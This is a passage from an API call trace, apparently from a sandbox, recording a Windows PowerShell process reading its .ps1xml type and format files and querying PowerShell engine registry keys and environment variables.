	[0735.751] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.751] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.752] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.753] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.753] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.753] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.755] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.755] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.755] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.756] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.756] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.756] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.757] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.757] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.760] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.760] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.761] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.761] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.763] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.763] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.763] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.764] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.764] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.764] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.765] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.765] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.765] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.766] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.766] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.766] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.771] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.771] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.771] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.772] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.772] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.772] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.772] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.773] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0735.773] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x1b4, lpOverlapped=0x0) returned 1
	[0735.773] ReadFile (in: hFile=0x324, lpBuffer=0x2d780c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d780c0*, lpNumberOfBytesRead=0xed2a8*=0x0, lpOverlapped=0x0) returned 1
	[0735.773] CloseHandle (hObject=0x324) returned 1
	[0735.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xecfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0735.774] SetErrorMode (uMode=0x1) returned 0x1
	[0735.774] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed220 | out: lpFileInformation=0xed220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0735.774] SetErrorMode (uMode=0x1) returned 0x1
	[0735.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0735.774] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed308 | out: phkResult=0xed308*=0x324) returned 0x0
	[0735.774] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed28c, lpData=0x0, lpcbData=0xed288*=0x0 | out: lpType=0xed28c*=0x1, lpData=0x0, lpcbData=0xed288*=0x56) returned 0x0
	[0735.774] CoTaskMemAlloc (cb=0x5a) returned 0x1b6d9640
	[0735.774] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed25c, lpData=0x1b6d9640, lpcbData=0xed258*=0x56 | out: lpType=0xed25c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed258*=0x56) returned 0x0
	[0735.774] CoTaskMemFree (pv=0x1b6d9640) 
	[0735.774] RegCloseKey (hKey=0x324) returned 0x0
	[0735.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0735.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xece00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0744.504] VirtualQuery (in: lpAddress=0xebff0, lpBuffer=0xeceb0, dwLength=0x30 | out: lpBuffer=0xeceb0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0747.231] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0747.231] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0747.231] CoTaskMemFree (pv=0x1b6e3570) 
	[0748.614] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4a8 | out: phkResult=0xed4a8*=0x310) returned 0x0
	[0748.614] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0xed4bc, lpData=0x0, lpcbData=0xed4b8*=0x0 | out: lpType=0xed4bc*=0x1, lpData=0x0, lpcbData=0xed4b8*=0x74) returned 0x0
	[0748.614] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0xed42c, lpData=0x0, lpcbData=0xed428*=0x0 | out: lpType=0xed42c*=0x1, lpData=0x0, lpcbData=0xed428*=0x74) returned 0x0
	[0748.614] CoTaskMemAlloc (cb=0x78) returned 0x3420b0
	[0748.614] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0xed3fc, lpData=0x3420b0, lpcbData=0xed3f8*=0x74 | out: lpType=0xed3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xed3f8*=0x74) returned 0x0
	[0748.614] CoTaskMemFree (pv=0x3420b0) 
	[0748.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xed170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0748.614] SetErrorMode (uMode=0x1) returned 0x1
	[0748.617] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xed380 | out: lpFileInformation=0xed380*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0748.617] SetErrorMode (uMode=0x1) returned 0x1
	[0748.619] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3460
	[0748.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.619] CoTaskMemFree (pv=0x1b6e3460) 
	[0748.632] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3460
	[0748.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.632] CoTaskMemFree (pv=0x1b6e3460) 
	[0748.634] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3460
	[0748.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.634] CoTaskMemFree (pv=0x1b6e3460) 
	[0748.635] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3460
	[0748.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.635] CoTaskMemFree (pv=0x1b6e3460) 
	[0748.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0748.636] SetErrorMode (uMode=0x1) returned 0x1
	[0748.637] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0748.637] GetFileType (hFile=0x31c) returned 0x1
	[0748.637] SetErrorMode (uMode=0x1) returned 0x1
	[0748.637] GetFileType (hFile=0x31c) returned 0x1
	[0748.637] ReadFile (in: hFile=0x31c, lpBuffer=0x341fad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x341fad8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0749.802] ReadFile (in: hFile=0x31c, lpBuffer=0x341fad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x341fad8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0749.803] ReadFile (in: hFile=0x31c, lpBuffer=0x341fad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x341fad8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0749.803] ReadFile (in: hFile=0x31c, lpBuffer=0x341fad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x341fad8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0749.804] ReadFile (in: hFile=0x31c, lpBuffer=0x341fad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x341fad8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0749.804] ReadFile (in: hFile=0x31c, lpBuffer=0x341fad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x341fad8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0749.804] ReadFile (in: hFile=0x31c, lpBuffer=0x341fad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x341fad8*, lpNumberOfBytesRead=0xed018*=0x9e2, lpOverlapped=0x0) returned 1
	[0749.804] ReadFile (in: hFile=0x31c, lpBuffer=0x341f022, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x341f022*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0749.805] ReadFile (in: hFile=0x31c, lpBuffer=0x341fad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x341fad8*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0749.805] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed0a8 | out: phkResult=0xed0a8*=0x31c) returned 0x0
	[0749.805] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed02c, lpData=0x0, lpcbData=0xed028*=0x0 | out: lpType=0xed02c*=0x1, lpData=0x0, lpcbData=0xed028*=0x56) returned 0x0
	[0749.805] CoTaskMemAlloc (cb=0x5a) returned 0x1b6d8f40
	[0749.805] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecffc, lpData=0x1b6d8f40, lpcbData=0xecff8*=0x56 | out: lpType=0xecffc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecff8*=0x56) returned 0x0
	[0749.805] CoTaskMemFree (pv=0x1b6d8f40) 
	[0749.805] RegCloseKey (hKey=0x31c) returned 0x0
	[0749.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0749.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xecba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0749.816] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x43e750ff, Data2=0x1e38, Data3=0x4bf9, Data4=([0]=0xbb, [1]=0x49, [2]=0x97, [3]=0x8d, [4]=0xab, [5]=0x81, [6]=0xe8, [7]=0x1))) returned 0x0
	[0749.831] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x6a829c79, Data2=0x8b80, Data3=0x4af3, Data4=([0]=0xaa, [1]=0xc, [2]=0x1b, [3]=0x8e, [4]=0x21, [5]=0x9d, [6]=0xa2, [7]=0x6e))) returned 0x0
	[0749.835] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0749.835] GetFileType (hFile=0x31c) returned 0x1
	[0749.835] SetErrorMode (uMode=0x1) returned 0x1
	[0749.836] GetFileType (hFile=0x31c) returned 0x1
	[0749.836] ReadFile (in: hFile=0x31c, lpBuffer=0x344a640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x344a640*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0749.837] ReadFile (in: hFile=0x31c, lpBuffer=0x344a640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x344a640*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0751.206] ReadFile (in: hFile=0x31c, lpBuffer=0x344a640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x344a640*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0751.207] ReadFile (in: hFile=0x31c, lpBuffer=0x344a640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x344a640*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0751.207] ReadFile (in: hFile=0x31c, lpBuffer=0x344a640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x344a640*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0751.209] ReadFile (in: hFile=0x31c, lpBuffer=0x344a640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x344a640*, lpNumberOfBytesRead=0xed018*=0xfb2, lpOverlapped=0x0) returned 1
	[0751.209] ReadFile (in: hFile=0x31c, lpBuffer=0x3449d5a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x3449d5a*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0751.209] ReadFile (in: hFile=0x31c, lpBuffer=0x344a640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x344a640*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0751.209] CloseHandle (hObject=0x31c) returned 1
	[0751.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0751.209] SetErrorMode (uMode=0x1) returned 0x1
	[0751.210] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xecfc0 | out: lpFileInformation=0xecfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0751.210] SetErrorMode (uMode=0x1) returned 0x1
	[0751.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
